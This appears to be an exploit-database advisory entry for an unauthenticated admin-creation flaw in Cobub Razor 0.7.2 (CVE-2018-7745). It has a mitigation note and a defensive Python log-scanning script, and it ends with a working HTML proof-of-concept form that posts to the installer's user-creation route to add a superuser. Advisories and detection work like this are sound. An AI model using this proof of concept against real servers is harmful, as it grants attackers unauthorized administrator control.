Vendor: Razor
By: ppb
CVSS: 7.5 (HIGH)
Type: Authentication Bypass
CWE: 287
Product Name: Razor
Affected Version From: 0.7.2
Affected Version To: 0.7.2
Patch Exists: YES
Related CVE: CVE-2018-7745
CPE: a:cobub:razor:0.7.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Cobub Razor 0.7.2 Add New Superuser User

Cobub Razor 0.7.2 contains a vulnerability that allows an attacker to add an administrator user without authentication. To exploit it, an attacker updates the URL in the proof-of-concept form, saves it as an HTML file, and opens it.

Mitigation:

Upgrade to the latest version of Cobub Razor to mitigate this vulnerability.
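
One way to check web server logs for requests to this endpoint, as an added example that is not part of the original advisory or the Exploit-DB entry. It assumes combined-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Route taken from the form action in the proof of concept on this page.
INSTALL_ROUTE = "install/installation/createuserinfo"

# Common/combined access log format (an assumption; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_installer_posts(lines):
    """Return parsed entries for POSTs that reach the installer's user-creation route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Normalize before matching: decode percent-encoding, collapse
        # repeated slashes, and lowercase the request target.
        target = re.sub(r"/{2,}", "/", unquote(m["target"])).lower()
        if INSTALL_ROUTE in target:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "target": m["target"], "status": int(m["status"])})
    return hits

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Mar/2018:10:01:02 +0000] "GET /index.php?/report/console HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Mar/2018:10:01:09 +0000] "POST /index.php?/install/installation/createuserinfo HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [07/Mar/2018:10:05:44 +0000] "POST /index.php?/Install//installation/%63reateuserinfo HTTP/1.1" 302 0 "-" "curl/7.58"',
    '198.51.100.9 - - [07/Mar/2018:10:06:00 +0000] "POST /index.php?/user/login HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Mar/2018:10:07:00 +0000] "GET /index.php?/install/installation/createuserinfo HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_installer_posts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} -> {hit["target"]} ({hit["status"]})')
```

On a system whose installation is already complete, any hit is a reason to review the administrator accounts.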
Source

Exploit-DB raw data:

# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User]
# Date: [2018-03-07]
# Exploit Author: [ppb(ppb@5ecurity.cn)]
# Vendor Homepage: [https://github.com/cobub/razor/]
# Software Link: [https://github.com/cobub/razor/]
# Version: [0.72] 
# CVE : [CVE-2018-7745]

There is a vulnerability that can add an administrator user without login.
Update the URL and save it to an HTML file, then open it.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http://127.0.0.1/" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12@qq.com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>